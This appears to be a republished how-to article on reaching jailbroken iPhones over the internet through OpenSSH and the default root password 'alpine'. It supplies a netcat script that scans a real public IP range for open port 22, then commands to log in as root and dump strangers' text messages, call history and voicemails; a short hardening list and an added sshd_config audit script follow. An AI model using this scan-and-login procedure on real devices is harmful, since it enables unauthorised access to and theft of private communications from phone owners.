How to access iPhones remotely using OpenSSH

A jailbroken Apple iPhone with OpenSSH installed is accessible over the internet using ssh and the default root password “alpine”.

You can use a short script to find IP addresses that have port 22 open and try to log in. You can run this script from your Mac or any Linux machine.

#!/bin/sh
fourth=1
third=0
mkdir -p /tmp/scan-iphones/open
mkdir -p /tmp/scan-iphones/closed
while [ "$third" -lt 192 ] ; do
 while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphones/stop exists."
      exit 1
     fi
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"
    fi
   fi
  fi
  fourth=$(($fourth+1))
 done
 fourth=1
 third=$(($third+1))
done

The IP addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these are not iPhones, so not every IP address listed there is vulnerable. To stop the script press [CTRL]+[c] or type touch /tmp/scan-iphones/stop.

Now that you have IP addresses where you can log in, use one of these “features”:

Read all text messages

From your Mac or any Linux machine, type:
$ ssh root@IP-ADDRESS-OF-IPHONE
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;
 

See the call history

From your Mac or any Linux machine, type:
$ ssh root@IP-ADDRESS-OF-IPHONE
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db
SELECT * FROM call;

Listen to voicemails

From your Mac or any Linux machine, type:
$ scp root@IP-ADDRESS-OF-IPHONE:/private/var/mobile/Library/Voicemail/*.amr .
Open the Finder and drag the .amr files onto QuickTime to listen to them.

To secure your iPhone, you can use one or more of these measures:

  • Change the “root” password - On the Terminal, type # passwd.
  • Change the “mobile” password - On the Terminal, type # passwd mobile.
  • Disable OpenSSH start at boot time - Don’t know how to do this yet.
  • Stop OpenSSH for now - launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist.
  • Set “PermitRootLogin” to “no” - in /private/etc/ssh/sshd_config.
  • If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.
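
One way to verify the “PermitRootLogin” measure above, as an added example that is not part of the original article: a small audit that reports the value sshd will actually use from an sshd_config file. The function names and the sample files are made up for this illustration; “unset” means sshd falls back to its built-in default, which was yes before OpenSSH 7.0.

```shell
#!/bin/sh
# Added example: report the effective PermitRootLogin of an sshd_config.
# sshd uses the FIRST value it reads for a keyword, keyword names are
# case-insensitive, and lines starting with '#' are comments.

effective_permit_root_login() {
    # $1 = path to an sshd_config file; prints the value or "unset"
    awk -F '[ \t=]+' '
        /^[ \t]*#/ { next }                  # commented-out settings do not count
        { sub(/^[ \t]+/, "") }               # tolerate indented lines
        tolower($1) == "match" { exit }      # audit the global section only
        tolower($1) == "permitrootlogin" {   # first occurrence wins
            print tolower($2); found = 1; exit
        }
        END { if (!found) print "unset" }
    ' "$1"
}

audit_root_login() {
    # Returns 0 only when root login over SSH is explicitly disabled.
    value=$(effective_permit_root_login "$1")
    case "$value" in
        no)    echo "OK: root login over SSH is disabled"; return 0 ;;
        unset) echo "WARN: PermitRootLogin not set, sshd uses its default"; return 1 ;;
        *)     echo "WARN: PermitRootLogin is '$value'"; return 1 ;;
    esac
}

# Constructed sample files (not taken from a real device).
demo_dir=$(mktemp -d)
# 1. The setting is only present as a comment, so it has no effect.
printf '%s\n' '#PermitRootLogin no' 'Port 22' > "$demo_dir/default"
# 2. Hardened: the first value is "no"; the later "yes" is ignored.
printf '%s\n' 'Port 22' '  permitrootlogin no' 'PermitRootLogin yes' > "$demo_dir/hardened"
# 3. Root login allowed globally; the "no" only applies inside a Match block.
printf '%s\n' 'PermitRootLogin=yes' 'Match User admin' 'PermitRootLogin no' > "$demo_dir/open"

for f in default hardened open; do
    printf '%s: ' "$f"
    audit_root_login "$demo_dir/$f" || true
done
```

On the device, point audit_root_login at /private/etc/ssh/sshd_config after editing it.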

I found this Interesting Article on http://meinit.nl/howto-access-iphones-remotely-using-openssh


